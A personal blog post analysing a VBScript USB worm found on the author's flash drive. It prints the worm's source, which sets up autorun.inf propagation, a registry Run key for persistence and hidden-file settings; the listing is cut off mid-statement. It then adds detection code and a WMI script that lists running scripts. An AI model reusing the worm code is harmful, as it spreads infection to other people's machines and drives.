VB Script: How to create a virus?

How to create a virus?

For quite a few weeks I had been having a slow PC, one that eventually begged for a restart. I turned off all of the Windows services, removed all unnecessary software and even some necessary software that I used only infrequently. Still to no avail. Then I went through my registry to clean up unwanted Run and RunOnce entries.

Whenever I turned on the computer I could see a lot of wscript.exe processes running, tens of them, hogging my CPU and memory like anything. I thought it might be a network policy imposed by the network department, and I used to close all of the running scripts one by one. But an eventual talk with the network admin revealed that no policy "runs" on the PC at start-up, and that they had nothing to do with the wscript.exe scripts.

Since I was running Symantec Endpoint Protection with up-to-date virus definitions, I could not imagine there being a virus on my PC.

Most people think that WScript.EXE is a virus, which it is not. It is the Windows Script Host (WSH). I have also used WScript quite a few times myself, which is probably why I never thought of removing that exe.


It can, however, execute scripts (VBScript or JScript) that you may not want run.

The following is a simple example taken from MSDN, showing how a script writes to the registry:

Dim WshShell, bKey
Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.RegWrite "HKCU\Software\ACME\FortuneTeller\", 1, "REG_BINARY"
WshShell.RegWrite "HKCU\Software\ACME\FortuneTeller\MindReader", "Goocher!", "REG_SZ"

bKey = WshShell.RegRead("HKCU\Software\ACME\FortuneTeller\")
WScript.Echo WshShell.RegRead("HKCU\Software\ACME\FortuneTeller\MindReader")

WshShell.RegDelete "HKCU\Software\ACME\FortuneTeller\MindReader"
WshShell.RegDelete "HKCU\Software\ACME\FortuneTeller\"
WshShell.RegDelete "HKCU\Software\ACME\"


So, long story short, this always used to happen when I inserted my flash drive into the system. A couple of days ago, I cancelled the action window that pops up when you insert a flash drive. I browsed the drive using Windows Explorer (Control+E) and to my astonishment I found a .VBS file, which is a VBScript file. I renamed the file and opened it. It was the code that was hogging my PC!

Though I did not like the slow PC at all, because I couldn't work, I did enjoy reading the code (0:

This script is like a mischievous gremlin, quietly wreaking havoc on your computer and any flash drives that dare to cross its path. It’s sneaky, persistent, and definitely up to no good!

Here’s the high-level shenanigans happening in this script, explained in a way that even my grandma would find amusing:

Error? What Error?

The script starts by deciding that errors are for the weak. So, it tells the computer to ignore any mistakes and just keep going. We’re not here for perfection; we’re here for chaos!

Summon the File Wizards!

It conjures up some mystical beings known as FileSystemObject and Shell. These guys are like the Gandalf and Dumbledore of the Windows world, ready to mess with files, folders, and the registry.

Hide the Treasure (or Trash)!

The script checks if there’s a folder called "Tempe" on the C drive. If it finds this magical place, it hides it using some obscure wizardry. Because, clearly, hiding things makes them more special.

Sneaky Registry Tweaks

Next, it sneaks into the Windows registry—like a raccoon rummaging through your trash—and changes some settings to make sure hidden files stay hidden. It's like a digital version of sweeping dirt under the rug.

Unleash the Mysterious "win.exe"

If everything's going smoothly (or at least, nothing's exploded yet), the script checks if a mysterious "win.exe" file is lurking in "Tempe". If it is, the script runs it, because that’s always a good idea... said no one ever.

Infect the Flash Drives!

The script then enters an infinite loop of doom, where it inspects every flash drive you plug in. If it finds one, it sneakily plants some files, including a script that auto-runs whenever the drive is accessed. It’s like a party crasher that shows up every time you open the door.

Copy, Paste, Repeat

The script copies and hides more files onto the flash drive, making sure they’re all in on the fun. It’s like a digital version of glitter—you’ll never get rid of it.

Lather, Rinse, Repeat

This cycle of copying, hiding, and sneaky auto-running continues endlessly, or at least until someone pulls the plug or notices the shenanigans.

Ready to Dive in?

The following is what I found when I opened the d.vbs file; I have added a couple of comments to help the reader better understand the code :o)

--Start Code--

' On Error Resume Next - Because what's life without a little bit of denial?
' This will ignore any errors and proceed as if nothing's wrong. Which is fine, until it isn’t.

Set objfso = CreateObject("Scripting.FileSystemObject") ' Summoning the mystical FileSystemObject to manipulate files like a wizard.
Set ws = CreateObject("WScript.Shell") ' Bringing a shell into existence for registry manipulation. Don’t worry, it won’t bite. (Yet.)
Set sh = CreateObject("Shell.Application") ' Another shell, this one more inclined towards folder and file operations. Because redundancy is comfort.

sour = "C:\Tempe" ' Define a source folder path, possibly a summer retreat for files.

If objfso.FolderExists(sour) Then ' Check if the "Tempe" folder exists. It’s not a visit if there’s no destination.
Set tf = objfso.GetFolder(sour) ' Get that folder, hold it close.
tf.Attributes = 39 ' Hide it away with some mystical numbers (39 to be exact). Shhh, it’s a secret.
End If

a = 0 ' Setting up a little counter.
b = 10 ' Another counter, because one is never enough.
c = 10 ' And just for good measure, a third one.

' Time to mess with the registry!
ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Explorer", sour & "\" & "d.vbs"
' Writing a key that tells Windows to run "d.vbs" at startup. Because what's better than starting your day with some VBScript mischief?

ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", 1, "REG_DWORD"
' Toggling SuperHidden files on, because some files are just too shy.

ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
' Turn off showing SuperHidden files, further hiding the shy ones.

ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1"
' Ensuring regular hidden files stay hidden too. More secrets!

If a = 0 Then ' If the counter is still at zero, let’s get dangerous.

If objfso.FileExists("C:\Tempe\win.exe") Then ' Check if "win.exe" exists in "Tempe", a suspiciously named file in a suspiciously named folder.
ws.Run("C:\Tempe\win.exe") ' If it exists, run it. Because nothing could go wrong with that, right?
End If
End If

Do ' The beginning of an infinite loop, the gift that keeps on giving.
For Each flashdrive In objfso.Drives ' For each drive that might be a flash drive...
If (flashdrive.DriveType = 1 Or flashdrive.DriveType = 2) And flashdrive.Path <> "A:" Then ' ...and isn’t a floppy drive (because seriously, who still uses those?).

If (flashdrive.DriveType = 1) Then ' If it’s a removable drive...
pet = flashdrive.Path & "\" ' Path to the pet (flash drive).

Set tf = objfso.CreateTextFile(pet & "autorun.inf") ' Create an "autorun.inf" file to run scripts without asking nicely.
tf.WriteLine "[autorun]"
tf.WriteLine "shellexecute=wscript.exe d.vbs"
tf.WriteLine "shell=Open"
tf.WriteLine "Shell\Open\Command=wscript.exe d.vbs"
tf.WriteLine "Action=Open to View Folder"
tf.WriteLine "Icon=tere.ico" ' Give it a little icon flair with "tere.ico".
tf.Close

Set tf = objfso.GetFile(pet & "autorun.inf") ' Grab that "autorun.inf" file...
tf.Attributes = 39 ' ...and hide it too. Secrets everywhere!

If objfso.FileExists(pet & "autorun.inf") Then ' If it actually exists (always good to double-check).
Set f = objfso.GetFile(pet & "autorun.inf") ' Get the file...
size = f.Size ' ...check its size...
Set text = f.OpenAsTextStream(1, -2) ' ...and open it up as a text stream.

Do While Not text.AtEndOfStream ' While we're not at the end of this stream of consciousness...
source = source & text.ReadLine ' ...keep reading it line by line.
source = source & vbCrLf ' Add a line break because we're civilized.
Loop
End If

If tf = source Then ' If the "autorun.inf" file is what we think it is...
sour = "C:\Tempe" ' ...set the source path to "Tempe".
Else
Set f = objfso.GetFile(pet & "autorun.inf") ' Otherwise, delete the imposter.
objfso.DeleteFile(f)
End If

If a = 0 Then ' If we're still at the starting point of our counter journey...
ws.Run(pet) ' Run the flash drive path.
ws.Run(pet & "win.exe") ' Run "win.exe" because, why not double down?
End If

a = a + 1 ' Increment that counter. One step closer to...something.
sour = "C:\Tempe" ' Keep that source path consistent.
pet = flashdrive.Path & "\" ' Get the flash drive path again.
dest = flashdrive.Path & "\Tempe" ' Create a destination path on the flash drive.

sours = "C:\Tempe\" ' Yet another source path because it’s good to have backups.

If a = 3 Then ' When the counter hits three...
If objfso.FileExists(pet & "autorun.inf") Then ' Check if our friend "autorun.inf" is still around.
objfso.DeleteFile(pet & "autorun.inf") ' And then delete it because three is enough.

Set Fol = objfso.GetFolder(sour) ' Get the "Tempe" folder again.
Set tf = objfso.CreateTextFile(pet & "autorun.inf") ' Recreate that "autorun.inf" file.
tf.WriteLine "[autorun]"
tf.WriteLine "shellexecute=wscript.exe d.vbs"
tf.WriteLine "shell=Open"
tf.WriteLine "Shell\Open\Command=wscript.exe d.vbs"
tf.WriteLine "Action=Open to View Folder"
tf.WriteLine "Icon=tere.ico"
tf.Close

Set tf = objfso.GetFile(pet & "autorun.inf") ' And hide it again. It’s a vicious cycle.
tf.Attributes = 39
End If
End If

If objfso.FileExists(pet & "d.vbs") Then ' Check if "d.vbs" exists in the flash drive.
sour = "C:\Tempe" ' If it does, keep the source path consistent.
Else
Set Fol = objfso.GetFolder(sour) ' Otherwise, get that "Tempe" folder...
Set f = objfso.GetFile(Fol & "\d.vbs") ' ...get the "d.vbs" file...
objfso.CopyFile f, pet, OverWriteFiles ' ...and copy it to the flash drive. Rinse and repeat.

Set f = objfso.GetFile(pet & "d.vbs")
f.Attributes = 39 ' Hide the "d.vbs" file too.

Set f = objfso.GetFile(Fol & "\win.exe") ' Do the same with "win.exe"...
objfso.CopyFile f, pet, OverWriteFiles
Set f = objfso.GetFile(pet & "win.exe")
f.Attributes = 39

Set f = objfso.GetFile(Fol & "\tere.ico") ' ...and with "tere.ico".
objfso.CopyFile f, pet, OverWriteFiles
Set f = objfso.GetFile(pet & "tere.ico")
f.Attributes = 39

Set tf = objfso.CreateTextFile(pet & "autorun.inf") ' Recreate "autorun.inf" for fun.
tf.WriteLine "[autorun]"
tf.WriteLine "shellexecute=wscript.exe d.vbs"
tf.WriteLine "shell=Open"
tf.WriteLine "Shell\Open\Command=wscript.exe d.vbs"
tf.WriteLine "Action=Open to View Folder"
tf.WriteLine "Icon=tere.ico"
tf.Close

Set tf = objfso.GetFile(pet & "autorun.inf") ' Hide it (again).
tf.Attributes = 39

Set mf = objfso.GetFile(pet & "autorun.inf") ' Check the file size, because we care.
size = mf.Size
Set text = mf.OpenAsTextStream(1, -2) ' Open it up to read some more.
Do While Not text.AtEndOfStream
source = source & text.ReadLine ' Read, read, read.
source = source & vbCrLf ' Line break, because aesthetics matter.
Loop
End If

If objfso.FolderExists(sour) Then ' Check

--End Code--
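From the defender's side, the artifacts this script leaves behind are easy to check for. The following Python is an added example (not part of the original post, and not the script above): it parses an autorun.inf like the one the worm writes and flags the script-host launch, decodes the attribute value 39 it sets on its files, and compares Explorer\Advanced values against the three the script writes. The sample autorun.inf is constructed from the lines shown above.

```python
import re

# Attribute bits as used by FileSystemObject's Attributes property (39 = 1+2+4+32).
ATTRIBUTE_BITS = {1: "ReadOnly", 2: "Hidden", 4: "System", 32: "Archive"}
# Explorer\Advanced values exactly as the script's three RegWrite calls set them.
WORM_EXPLORER_VALUES = {"SuperHidden": 1, "ShowSuperHidden": 0, "Hidden": 1}
SCRIPT_LAUNCH = re.compile(r"\b(?:wscript|cscript)\.exe\b|\.(?:vbs|vbe|js|jse|wsf)\b", re.I)

# Constructed sample matching the lines the worm writes; not a real capture.
SAMPLE_AUTORUN = """[autorun]
shellexecute=wscript.exe d.vbs
shell=Open
Shell\\Open\\Command=wscript.exe d.vbs
Action=Open to View Folder
Icon=tere.ico
"""

def decode_attributes(value):
    """Names of the attribute flags set in an FSO Attributes value."""
    return [name for bit, name in ATTRIBUTE_BITS.items() if value & bit]

def parse_autorun(text):
    """Return the key=value pairs of the [autorun] section, keys lower-cased."""
    entries, in_section = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
        elif in_section and "=" in line:
            key, val = line.split("=", 1)
            entries[key.strip().lower()] = val.strip()
    return entries

def autorun_findings(text):
    """Indicators that an autorun.inf launches a script host the way this one does."""
    entries, findings = parse_autorun(text), []
    for key in ("shellexecute", "open", "shell\\open\\command"):
        if key in entries and SCRIPT_LAUNCH.search(entries[key]):
            findings.append(f"{key} runs a script: {entries[key]}")
    if entries.get("shell", "").lower() == "open" and "shell\\open\\command" in entries:
        findings.append("default 'Open' verb redirected to a custom command")
    if "action" in entries:
        findings.append(f"AutoPlay entry disguised as {entries['action']!r}")
    return findings

def explorer_values_match_worm(values):
    """True when Explorer\\Advanced values equal the triple this script writes."""
    got = {k.lower(): int(v) for k, v in values.items()}
    return all(got.get(k.lower()) == v for k, v in WORM_EXPLORER_VALUES.items())
```

On a real drive, read the autorun.inf from the drive root and pass its text to autorun_findings; the registry values can be read with winreg from HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.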

If you see a lot of wscript.exe processes running on your machine

and you still doubt what they are doing, copy and paste the following code into a file named Check for virus.VBS and double-click it to run it.

The following code shows, one message box at a time, the command line of every script being run under wscript.exe (or cscript.exe).


strComputer = "." ' "." means the local machine
' Connect to the WMI service on the local machine
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
' Query every running script-host process (cscript.exe or wscript.exe)
Set colItems = objWMIService.ExecQuery _
    ("Select * from Win32_Process Where Name = 'cscript.exe'" & _
        " OR Name = 'wscript.exe'")
' Show the full command line (host plus script path) of each one in a message box
For Each objItem in colItems
    Wscript.Echo objItem.CommandLine
Next


Keep pressing the OK button to see the whole list of scripts being run under wscript.exe.

Enjoy!